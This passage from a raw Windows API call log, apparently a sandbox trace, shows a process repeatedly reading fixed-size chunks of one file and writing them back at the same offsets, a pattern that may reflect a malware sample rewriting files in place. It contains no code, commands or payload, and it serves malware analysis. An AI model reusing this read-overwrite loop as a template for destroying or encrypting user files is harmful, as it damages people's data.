lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0104.815] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1538210, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.815] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0104.815] GetProcessHeap () returned 0x500000 [0104.816] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0104.816] GetProcessHeap () returned 0x500000 [0104.816] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0104.817] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x15752a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.817] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0104.825] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x15752a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.825] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0104.826] GetProcessHeap () returned 0x500000 [0104.826] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0104.826] GetProcessHeap () returned 0x500000 [0104.826] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0104.826] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x15b2330, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.826] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0104.878] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x15b2330, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.878] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0104.879] GetProcessHeap () returned 0x500000 [0104.879] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0104.879] GetProcessHeap () returned 0x500000 [0104.879] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0104.879] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x15ef3c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.879] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0104.897] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x15ef3c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.897] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0104.898] GetProcessHeap () returned 0x500000 [0104.899] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0104.899] GetProcessHeap () returned 0x500000 [0104.899] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0104.899] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x162c450, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.899] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0104.908] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x162c450, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.909] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0104.909] GetProcessHeap () returned 0x500000 [0104.909] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0104.909] GetProcessHeap () returned 0x500000 [0104.909] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0104.909] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x16694e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.909] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0104.919] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x16694e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.919] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0104.920] GetProcessHeap () returned 0x500000 [0104.920] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0104.920] GetProcessHeap () returned 0x500000 [0104.920] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0104.920] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x16a6570, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.920] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0104.930] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x16a6570, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.930] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0104.930] GetProcessHeap () returned 0x500000 [0104.930] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0104.930] GetProcessHeap () returned 0x500000 [0104.930] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0104.931] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x16e3600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.931] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0104.948] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x16e3600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.949] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0104.950] GetProcessHeap () returned 0x500000 [0104.950] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0104.950] GetProcessHeap () returned 0x500000 [0104.950] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0104.951] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1720690, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.951] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0104.960] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1720690, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.960] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0104.961] GetProcessHeap () returned 0x500000 [0104.961] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0104.961] GetProcessHeap () returned 0x500000 [0104.961] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0104.961] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x175d720, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.961] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0104.969] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x175d720, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.969] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0104.970] GetProcessHeap () returned 0x500000 [0104.970] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0104.970] GetProcessHeap () returned 0x500000 [0104.970] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0104.970] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x179a7b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.970] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0104.988] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x179a7b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.989] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0104.989] GetProcessHeap () returned 0x500000 [0104.989] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0104.989] GetProcessHeap () returned 0x500000 [0104.989] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0104.989] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x17d7840, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.989] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0105.026] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x17d7840, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.026] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0105.026] GetProcessHeap () returned 0x500000 [0105.027] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0105.027] GetProcessHeap () returned 0x500000 [0105.027] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0105.027] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x18148d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.027] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0105.134] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x18148d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.134] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0105.135] GetProcessHeap () returned 0x500000 [0105.135] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0105.135] GetProcessHeap () returned 0x500000 [0105.135] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0105.135] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1851960, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.135] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0105.301] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1851960, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.301] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0105.302] GetProcessHeap () returned 0x500000 [0105.302] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0105.302] GetProcessHeap () returned 0x500000 [0105.302] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0105.302] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x188e9f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.302] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0105.308] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x188e9f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.308] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0105.308] GetProcessHeap () returned 0x500000 [0105.308] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0105.308] GetProcessHeap () returned 0x500000 [0105.308] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0105.308] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x18cba80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.308] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0105.335] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x18cba80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.335] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0105.336] GetProcessHeap () returned 0x500000 [0105.336] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0105.336] GetProcessHeap () returned 0x500000 [0105.336] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0105.336] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1908b10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.336] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0105.349] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1908b10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.350] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0105.352] GetProcessHeap () returned 0x500000 [0105.352] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0105.352] GetProcessHeap () returned 0x500000 [0105.352] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0105.352] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1945ba0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.352] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0105.359] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1945ba0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.359] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0105.359] GetProcessHeap () returned 0x500000 [0105.359] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0105.360] GetProcessHeap () returned 0x500000 [0105.360] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0105.360] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1982c30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.360] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0107.931] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1982c30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.931] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0107.932] GetProcessHeap () returned 0x500000 [0107.932] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0107.932] GetProcessHeap () returned 0x500000 [0107.932] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0107.932] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x19bfcc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.932] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0107.940] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x19bfcc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.940] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0107.941] GetProcessHeap () returned 0x500000 [0107.941] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0107.941] GetProcessHeap () returned 0x500000 [0107.941] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0107.941] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x19fcd50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.941] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0108.002] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x19fcd50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0108.002] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0108.003] GetProcessHeap () returned 0x500000 [0108.003] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0108.003] GetProcessHeap () returned 0x500000 [0108.004] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0108.004] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1a39de0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0108.004] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0108.012] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1a39de0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0108.012] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0108.012] GetProcessHeap () returned 0x500000 [0108.012] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0108.012] GetProcessHeap () returned 0x500000 [0108.012] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0108.012] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1a76e70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0108.012] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0108.019] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1a76e70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0108.019] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0108.019] GetProcessHeap () returned 0x500000 [0108.019] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0108.019] GetProcessHeap () returned 0x500000 [0108.019] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0108.019] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1ab3f00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0108.019] ReadFile (in: hFile=0x220, 